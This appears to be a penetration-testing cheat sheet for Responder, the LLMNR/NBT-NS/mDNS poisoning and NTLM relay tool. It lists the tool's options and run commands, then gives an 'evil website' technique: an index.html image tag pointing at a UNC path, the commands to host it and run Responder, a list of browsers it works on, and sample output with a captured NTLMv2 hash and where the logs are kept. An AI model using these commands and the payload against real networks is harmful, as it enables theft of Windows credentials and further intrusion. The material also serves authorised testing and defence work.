LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay.


git clone


Disable UFW before using.

python3 -I eth0 -w -r -f


Usage: python ./ -I eth0 -w -r -f
python ./ -I eth0 -wrf

  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -A, --analyze         Analyze mode. This option allows you to see NBT-NS,
                        BROWSER, LLMNR requests without responding.
  -I eth0, --interface=eth0
                        Network interface to use, you can use 'ALL' as a
                        wildcard for all interfaces
  -i, --ip=
                        Local IP to use (only for OSX)
  -e, --externalip=
                        Poison all requests with another IP address than
                        Responder's one.
  -b, --basic           Return a Basic HTTP authentication. Default: NTLM
  -r, --wredir          Enable answers for netbios wredir suffix queries.
                        Answering to wredir will likely break stuff on the
                        network. Default: False
  -d, --NBTNSdomain     Enable answers for netbios domain suffix queries.
                        Answering to domain suffixes will likely break stuff
                        on the network. Default: False
  -f, --fingerprint     This option allows you to fingerprint a host that
                        issued an NBT-NS or LLMNR query.
  -w, --wpad            Start the WPAD rogue proxy server. Default value is
  -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
                        Upstream HTTP proxy used by the rogue WPAD Proxy for
                        outgoing requests (format: host:port)
  -F, --ForceWpadAuth   Force NTLM/Basic authentication on wpad.dat file
                        retrieval. This may cause a login prompt. Default:
  -P, --ProxyAuth       Force NTLM (transparently)/Basic (prompt)
                        authentication for the proxy. WPAD doesn't need to be
                        ON. This option is highly effective when combined with
                        -r. Default: False
  --lm                  Force LM hashing downgrade for Windows XP/2003 and
                        earlier. Default: False
  -v, --verbose         Increase verbosity.


Analyse mode

sudo ./ -I <interface> -A -v

Full mode

sudo ./ -I <interface> -w -F --lm -v

Evil website

Works on:

  • Internet Explorer 8 (8.0.7600.16385, Windows 7)
  • Internet Explorer 8 (8.0.7601.17514, Windows Server 2008R2)
  • Internet Explorer 11 (11.719.18362.0, Windows 10)
  • Internet Explorer 11 (11.2273.14393.0, Windows Server 2016)
  • Internet Explorer 11 (11.1098.17763.0, Windows Server 2019)

Does not work on:

  • Microsoft Edge (44.18362.449.0 Windows 10)
  • Google Chrome (80.0.3987.149, Windows 10)
  • Brave (1.5.115, Windows 10)
  • Opera (67.0.3575.115, Windows 10)

Index.html content

cat index.html

<img src="\\\picture.jpg" alt=""></img>

Host the site

python3 -m http.server 80

Start responder to catch hashes

responder -I eth0 -A -f -v
[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP               []
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[!] Error starting TCP server on port 80, check permissions or other servers running.
[+] Listening for events...

Client browsed to site


Hashes aquired

[SMB] NTLMv2-SSP Client   :
[SMB] NTLMv2-SSP Username : WS7-2\User
[SMB] NTLMv2-SSP Hash     : User::WS7-2:2f5d1007fc42a38e:74DF5D8A06BF0059BCCA1AB300782DED:0101000000000000C0653150DE09D2012E16D14827C3AF5500[...]

Find captured hashes

Folder /logs in the responder folder

$ ll
total 22M
-rw-r--r-- 1 root root    0 Jun 19 09:09 Analyzer-Session.log
-rw-r--r-- 1 root root 226K Nov 25 08:55 Config-Responder.log
-rw-r--r-- 1 root root 2.3K Jul  7 10:23 HTTP-NTLMv2-
-rw-r--r-- 1 root root 1.2K Jul  7 09:06 HTTP-NTLMv2-
-rw-r--r-- 1 root root 1.2K Oct 26 11:17 HTTP-NTLMv2-

URL List